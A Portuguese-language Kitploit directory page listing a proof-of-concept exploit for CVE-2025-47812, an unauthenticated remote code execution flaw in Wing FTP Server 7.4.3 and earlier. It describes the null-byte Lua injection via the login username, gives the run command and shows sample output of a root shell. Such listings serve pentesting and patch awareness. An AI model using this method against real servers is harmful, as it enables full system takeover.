Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC — Exploit de prova de conceito para CVE-2025-47812: execução remota de código não autenticada no Wing FTP Server <= 7.4.3 via injeção de byte nulo no parâmetro de nome de usuário, fornecendo acesso a shell root/SYSTEM. | Kitploit
Ferramentas/GitHubGitHub/estebanzarate/cve-2025-47812-wing-ftp-server-7.4.3-unauthenticated-rce-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubestebanzarate/cve-2025-47812-wing-ftp-server-7.4.3-unauthenticated-rce-poc

CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC

Exploit de prova de conceito para CVE-2025-47812: execução remota de código não autenticada no Wing FTP Server <= 7.4.3 via injeção de byte nulo no parâmetro de nome de usuário, fornecendo acesso a shell root/SYSTEM.

Ver Repositório
21há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-47812 — Wing FTP Server <= 7.4.3 RCE Não Autenticado (PoC)

Vulnerabilidade de execução remota de código não autenticada no Wing FTP Server <= 7.4.3. Um byte NULL injetado no parâmetro username durante o login faz com que código Lua seja escrito no arquivo de sessão. Quando /dir.html é acessado com o cookie de sessão resultante, o código injetado é executado — como root no Linux ou SYSTEM no Windows.


Como funciona

  1. Um POST malicioso para /loginok.html injeta um byte NULL seguido de código Lua no campo username.
  2. O servidor cria um arquivo de sessão contendo o nome de usuário não sanitizado (incluindo o payload Lua).
  3. Uma requisição GET para /dir.html com o cookie UID retornado aciona a execução do código Lua injetado.
  4. O script faz logout entre comandos para evitar atingir o limite de sessões simultâneas do servidor.

Requisitos

  • Python 3
  • Instale as dependências:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

Uso

root@kitploit:~
python3 exploit.py -u http://TARGET

Exemplo:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)

[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
root

Referências

  • CVE-2025-47812
  • Lançamento do Wing FTP Server 7.4.4 (correção)
  • PoC original por 4m3rr0r

Créditos

  • Descoberta e exploit original: Sheikh Mohammad Hasan aka 4m3rr0r
  • Limpeza e simplificação: Esteban Zárate
Baixar ferramenta